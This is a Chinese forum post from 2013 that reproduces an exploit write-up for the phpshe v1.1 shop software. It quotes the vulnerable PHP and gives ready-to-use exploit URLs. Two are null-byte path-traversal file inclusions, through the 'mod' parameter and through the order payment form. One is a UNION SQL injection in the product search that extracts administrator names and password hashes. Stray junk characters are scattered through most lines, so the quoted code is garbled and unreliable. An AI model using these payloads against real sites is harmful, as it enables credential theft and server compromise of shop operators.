找回密码
 立即注册
查看: 2725|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:01:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/5 Q$ w. A% m3 ~, g6 ~
/* Phpshe v1.1 Vulnerability# E% Z5 E( p+ _5 w& d
/* ========================
( O: O0 T7 ?( ?+ e! s+ T/* By: : Kn1f3
+ D3 F0 q8 F7 D1 V: V3 X/ l/* E-Mail : 681796@qq.com
/ d2 B$ p+ g. {" @. K/ C* g/*******************************************************/& [5 I6 U; W+ d. X8 z$ r" O! h
0×00 整体大概参数传输
7 h( Z* y+ u5 [% G. l7 P
, L# v8 }: z* c) r& y
( l" _+ I: M. j

6 ]+ k5 \3 }) w# x. ?//common.php
. M4 C  p' `. p+ W: oif (get_magic_quotes_gpc()) {6 e* _' Z5 H9 e+ C0 [8 L9 q+ J
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');6 h' @: f$ K# Y3 y* Q
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
( s( ?$ }$ G' E. q6 w8 q}( }$ H, o1 m  i" P- k
else {
6 Q& D0 Z. }! x0 I  A!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');" l# H4 n+ G6 r( O" E  B
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
9 `5 W! _! v. C6 p}
9 }0 ~' M. W4 P0 e) r" _session_start();; d9 {3 G3 H) ~( K5 e8 Y
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');2 \0 [5 G: y0 |9 [& J
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');7 }# q9 s& r4 M& D: O( l' S5 [
' n" h0 F) @. T6 b: M( A$ N- K. j
0×01 包含漏洞  Z# t( [6 m5 \/ ?2 r
' D1 @. a' q5 ?8 c0 B* z

& r' D9 ?: \  l( N: x* w/ L8 [, k/ T- Z//首页文件  G' l5 D. T' {# n& V
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
6 E$ [  P% K6 a2 \include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞! y4 G& O, d* l6 ?5 B; [1 ^. _
pe_result();
$ `) z4 A! y+ s1 T0 D  C8 D?>
9 w' G6 F; q! w) o; G/ y6 f//common 文件 第15行开始3 d# s! t3 J% Z# O9 C  `! t
url路由配置, x7 k* v$ `5 y  y4 m+ r' `9 b
$module = $mod = $act = 'index';- @7 j+ G- d! i) L
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
5 s& _2 p; W6 u7 c5 j$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
0 y1 Z  S9 f% U5 ?, D* i$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
) L" v4 P) b" a! e) i) F//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%005 _% r  z4 [; v


- @: y$ Q& m* R, M
- Y1 ?- z& J$ L7 c* m4 O 0×02 搜索注入2 m# H# |2 e& o$ L

3 s6 ]- _: W) v* V* z<code id="code2">

//product.php文件. g6 v, m% c8 b6 O, R: u+ {) u
case 'list':7 e% H8 j5 W; j4 |) }
$category_id = intval($id);% q, l) ]- y" T' U- K
$info = $db->pe_select('category', array('category_id'=>$category_id));
' l4 `; n. B* l6 e: d9 h' s7 I//搜索9 K" V( h% N* t8 p, J' n
$sqlwhere = " and `product_state` = 1";
$ H8 Z% n4 \" A# ^9 cpe_lead('hook/category.hook.php');& ]4 r% }8 B4 u6 K! c" T+ ?
if ($category_id) {
$ W/ `  p8 ~3 L8 W/ _. E# b9 Kwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
) E; G0 L1 ^3 z* V& h}
( F: [- d* D- R+ T- a; O7 [- i$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤0 ]4 W7 v- ]% e* R
if ($_g_orderby) {
' i, H. h2 z& ~- i$ d5 @  s3 {$orderby = explode('_', $_g_orderby);; T, Z6 {* u9 \5 [$ G( u8 G! n+ ~" f' r! x
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";. f; @# P6 e4 C
}: o0 n; J* M; k+ H) J3 K
else {. T3 v; S/ D7 O! y1 C# u7 r
$sqlwhere .= " order by `product_id` desc";
* L' D, j7 L" x: n}
! s+ o. M. L9 G- D8 `$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));* T+ D& d2 y. d. m* k: I- {+ s" D9 f
//热卖排行
+ I5 C; U8 t. |2 W: v$product_hotlist = product_hotlist();
9 s1 N; H5 l  U4 ^//当前路径
' ?$ ?$ @' \' h$nowpath = category_path($category_id);* ]* O$ y/ G/ j6 [
$seo = pe_seo($info['category_name']);
' y$ O6 q0 I2 Cinclude(pe_tpl('product_list.html'));/ o7 K* G& A% h: j: k  w
//跟进selectall函数库6 K9 }+ U" j. p' w
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())+ s0 {( `8 H8 P3 a
{$ X  v5 Y5 a% D, z" r
//处理条件语句( F/ s, x$ R' n  a& R2 b/ a4 }
$sqlwhere = $this->_dowhere($where);( p) u, D" v# J+ n* D4 K; Z' u
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
3 s. g3 @! y  E4 F' D7 _# q}
# r  E2 s' L" ]//exp$ c8 i) E+ ]8 R) U+ w$ C1 A! W
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1+ b+ }4 L9 e  c( J* q

</code>% r0 Z4 q$ ?) u

& Z/ \9 W) S; J0×03 包含漏洞27 p1 Y. b5 b3 B
* ~# h' ?$ h: k
<code id="code3">

//order.php

case 'pay':


* y5 o+ v" [# `, q+ N* S' k7 H$order_id = pe_dbhold($_g_id);


! [# [& }" Y( T" Q  t" t$cache_payway = cache::get('payway');

9 s3 b- J9 j9 A3 Q7 K! P- |7 Y
foreach($cache_payway as $k => $v) {

& p1 E+ X9 U& Z4 e
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


' L: E  b9 O% [, gif ($k == 'bank') {


  C3 i+ @6 g+ q, h$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


; ^% w7 j6 L, b' ~3 `}


3 f0 W! W" \+ Q, T! S7 k}

- ]1 x: R/ @+ H( a2 z5 C
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

/ r$ Z% [8 ^' d
!$order['order_id'] && pe_error('订单号错误...');

/ m; |, d- \" N: d5 S
if (isset($_p_pesubmit)) {


6 x8 F) Q' G( W) bif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

+ v, F0 Y1 K4 G
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

( o1 F! K2 z. f
foreach ($info_list as $v) {

8 W' a4 A8 r' J6 T  {7 ~* G
$order['order_name'] .= "{$v['product_name']};";
/ W" Z( B6 z  B1 C3 _6 X


! ~8 E6 [6 G* @+ t" U- `7 f5 i4 K}

9 V. A+ P7 k- z+ y5 h# ~
echo '正在为您连接支付网站,请稍后...';


0 p5 W$ E; L( Einclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


" m% L6 O8 ~* g: E8 ^}//当一切准备好的时候就可以进行"鸡肋包含了"

% `9 m9 g3 p. m2 \$ D; X
else {

% r- U6 {9 A  p" p! C
pe_error('支付错误...');


# j( Q8 {) w# P}


7 D5 U, c& [7 i& K3 Z% D}


- G, U7 A& F* P* m7 S$seo = pe_seo('选择支付方式');

' A) y% B% D& O% j+ y( k
include(pe_tpl('order_pay.html'));


: a8 N4 `0 e0 o% Y* t! L/ bbreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>/ J/ u$ e7 K' p+ r( q/ T: K

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表